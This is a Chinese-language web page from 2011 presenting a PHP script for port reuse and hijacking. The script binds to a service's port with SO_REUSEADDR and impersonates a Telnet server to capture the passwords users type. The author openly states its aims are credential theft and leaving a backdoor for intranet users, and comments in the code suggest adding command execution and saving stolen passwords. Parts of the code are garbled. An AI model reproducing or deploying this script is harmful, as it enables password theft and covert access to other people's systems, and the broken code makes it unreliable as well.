您的位置主页 > PHP

PHP下实现端口复用/劫持

2011-07-01 21:02:05
假如监听127.0.0.1 ,访问共网IP不受影响,假如监听公网IP,127。0。0。1等IP不受影响。这个可以用于欺骗用户密码,因为原来的服务不可用了。或者留成针对内网用户的后门。最后欢迎加MSN:CQXY[AT]21CN。NET赐教。#!/usr/bin/php -q#c0dz by Darkness[BST]#Team:www.bugkidz.org#E-mail:cqxy[at]21cn.netif ($argc != 3 || in_array($argc[1] , array('--help','-h','?'))){echo "Use:#./$argv[0] <A href="http://www.bugkidz.org">www.bugkidz.org</A> 192.168.0.1 21\r\n";echo "c0dz By Darkness[BST]";exit;}error_reporting(E_ALL);
set_time_limit(0);
ob_implicit_flush();
$host = $argv[1];$port = $argv[2];if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";} /*建立SOCKET*/socket_set_option($sock,SOL_SOCKET,SO_REUSEADDR,1); /*设置SOCKET连接的属性为SO_REUSEADDR,这样才可以端口复用*/if (($ret = socket_bind($sock, $host, $port)) < 0) {echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";}/*绑定端口*/
if (($ret = socket_listen($sock, 5)) < 0) {echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";} /*开始监听*/
while(true) {
if (($sniffer = socket_accept($sock)) < 0) {echo "socket_accept() failed: reason: " . socket_strerror($sniffer) . "\n";break;}if ($port == 23){$txt = "Welcome to the Telnet Server\r\n";$txt .="User:\r\n";socket_write($sniffer, $txt, strlen($txt));} /*这里是伪装信息,把自己伪装成原来的TELNET服务器,这样来骗取密码*/
while(true) {
if(($buf _read($sniffer">=@socket_read($sniffer, 2048, PHP_BINARY_READ)) ==false){
break;
}
if (!$buf = trim($buf)) {continue;}
if ($buf == '!quit') {break;}if ($buf == '!shutdown') {socket_close($sniffer);break 2; /*其实这里可以调用system(),搞成一个CMD后门,反正你想怎么改都可以*/}
$sniff_data = "$buf\r\n";
/* else socket_write($sniffer, $sniff_data, strlen($sniff_data));*/echo $sniff_data;/*输出字符串,这里可以加进文件处理,保存密码什么的*/} socket_close($sniffer);
}socket_close($resock);socket_close($sock);?>